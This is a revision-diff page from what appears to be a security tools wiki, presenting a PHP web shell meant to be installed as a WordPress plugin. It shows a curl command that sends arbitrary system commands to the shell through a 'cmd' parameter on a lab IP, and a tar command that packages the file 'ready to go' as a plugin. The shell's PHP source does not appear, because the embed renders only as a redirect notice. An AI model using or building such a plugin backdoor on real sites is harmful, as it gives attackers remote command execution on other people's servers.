Difference between revisions of "WordPress Plugin - shell.php (variant 1)"
m |
|||
(8 intermediate revisions by the same user not shown) | |||
Line 2: | Line 2: | ||
E.g. | E.g. | ||
− | <syntaxhighlight lang=shell line> | + | <syntaxhighlight lang=shell-session line> |
curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh" | curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh" | ||
</syntaxhighlight> | </syntaxhighlight> | ||
− | + | Enough with intros so here's the code. | |
− | + | {{#github:webshells/wp_shell1.php|blaksec/sectools|master|php|line=1|start=1}} | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | } | ||
− | |||
− | } | ||
− | |||
− | |||
− | |||
+ | Now just tar it up and it's ready to go | ||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | tar -zcvf ./shell.tgz shell.php | ||
</syntaxhighlight> | </syntaxhighlight> |
Latest revision as of 21:42, 17 July 2018
The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.
E.g.
curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"
Enough with intros so here's the code.
Moved Permanently. Redirecting to https://cdn.jsdelivr.net/gh/blaksec/sectools@master/webshells/wp_shell1.php
Now just tar it up and it's ready to go
tar -zcvf ./shell.tgz shell.php